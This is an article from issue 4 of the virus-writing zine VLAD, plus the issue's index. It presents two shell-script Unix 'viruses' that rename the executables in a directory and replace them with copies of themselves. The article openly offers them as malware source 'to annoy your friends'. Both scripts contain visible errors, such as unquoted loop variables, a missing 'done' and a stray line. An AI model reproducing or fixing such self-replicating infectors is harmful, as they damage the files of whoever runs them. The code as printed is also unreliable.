Virus Labs & Distribution
VLAD #4 - Unix Viruses


  Lame Unix Viruses
  +---------------+

  Well, you might have read the title to this article and thought, well
  if the damn thing is lame.. why the fuck is it in vlad#4 ?!  This can
  be answered quite simply, we had one free space! :)  It was a bit of
  a dilemma to begin with, we had four articles and one space.  The problem
  was they were all kinda lame.  So it was a lame pick of the month episode.

  Out of the four articles this was the leastest lamest.  Well actually
  I don't know about that, but anyway it was the most different one we
  had sitting there.  Just to prove the title, the author of these
  masterpieces asked to remain anonymous to save his reputation.

  These "viruses" are the equivalent of a DOS batch file infector because
  they are written in shell language.  They function similarly to companion
  infectors by renaming the original file and replacing it with themselves.
  Disinfection is simple by 'mv'ing (moving) the original files back.

  Anyway, perhaps someone is interested so here they are.  There isn't
  much use for them except to annoy your friends when it messes up all
  the files in their directory.

+-----------------------------------+
#!/bin/sh
# Dumb Unix Virus
# I dont wanna write anutha dumb unix virus qark, i wont
# Due to excess lameness, dont distribute
# 
for files in *
do
 if [ -x files ]  
 then
     if [ ! -d files ]
     then
       mv files files.EVILVIRUS.HELPME
       cp $0 files
       chmod +x files
       files.EVILVIRUS.HELPME
     fi
   fi

+-----------------------------------+

cat << _EOF >unix.virus


#!/bin/csh
# Dumber Unix Virus
#  by 
#     SumUtherGuy
foreach i (*)
mv $i bak.$i
cp $0 $i  
i >> $i

end
_EOF

+-----------------------------------+


- VLAD #4 INDEX -
ARTICLE.0_0       Hidden Area Story By QuantumG

ARTICLE.1_1      

Introduction
ARTICLE.1_2       Aims and Policies
ARTICLE.1_3       Greets
ARTICLE.1_4       Members/Joining
ARTICLE.1_5       Dist/Contact Info
ARTICLE.1_6       Hidden Area Info
ARTICLE.1_7       Coding the Mag

ARTICLE.2_1      

Tax Office
ARTICLE.2_2       Fight Back!
ARTICLE.2_3       Interviews
ARTICLE.2_4       Cryptanalysis
ARTICLE.2_5       Slovakia
ARTICLE.2_6       TBMem Flaws
ARTICLE.2_7       F-Prot Troubles

ARTICLE.3_1      

Win Infection
ARTICLE.3_2       WinVir14 Disasm
ARTICLE.3_3       Andropinis
ARTICLE.3_4       Super Virus-2
ARTICLE.3_5       VTBoot
ARTICLE.3_6       Ebbelwoi VQ7
ARTICLE.3_7       Unix Viruses

ARTICLE.4_1      

Virus Descriptions
ARTICLE.4_2       Ender Wiggin
ARTICLE.4_3       WinSurfer
ARTICLE.4_4       Antipode 2.0
ARTICLE.4_5       Bane
ARTICLE.4_6       RHINCE
ARTICLE.4_7       Tasha Yar

ARTICLE.5_1      

Replicator
ARTICLE.5_2       ART v2.2
ARTICLE.5_3       Good Times!
ARTICLE.5_4       DOS Idle
ARTICLE.5_5       Neither
ARTICLE.5_6       Virus Scripts
ARTICLE.5_7       What's Next ?

About VLAD - Links - Contact Us - Main